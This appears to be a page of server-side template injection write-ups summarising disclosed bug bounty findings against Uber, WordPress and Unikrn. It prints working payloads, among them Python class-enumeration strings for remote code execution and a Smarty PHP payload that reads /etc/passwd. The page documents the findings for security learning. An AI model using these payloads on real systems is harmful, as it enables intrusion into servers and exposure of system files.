Server-Side Template Injection Writeups
Uber - Template Injection Python RCE
Personal Blog Post:
Orange Tsai discovered a Template Injection on rider.uber.com domain. Changing user name to the payload {{ '7'*7 }}
will return the value '7777777'
in the followup email "Your Uber account information has been updated" notification.

//Payloads used
{{ '7'*7 }}
{{ [].class.base.subclasses() }} # get all classes
{{''.class.mro()[1].subclasses()}}
{%for c in [1,2,3] %}{{c,c,c}}{% endfor %}
WordPress - XSS
The billing_first_name body parameter on the POST /wp-admin/admin-ajax.php route is vulnerable to Template Injection which allows Stored XSS on the account page.

The Stored XSS is returned on the accounts page https://mercantile.wordpress.org/my_account:

Unikrn - Smarty Template
Researcher discovered on of the fields on the user invite page was vulnerable to Template Injection. Upon entering {7*7} into all the fields for registration a verbose error message is returned in the email message notification, revealing a Smarty Template engine message.

Further exploited using a php payload to extract the /etc/passwd file:
{php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php}

Last updated
Was this helpful?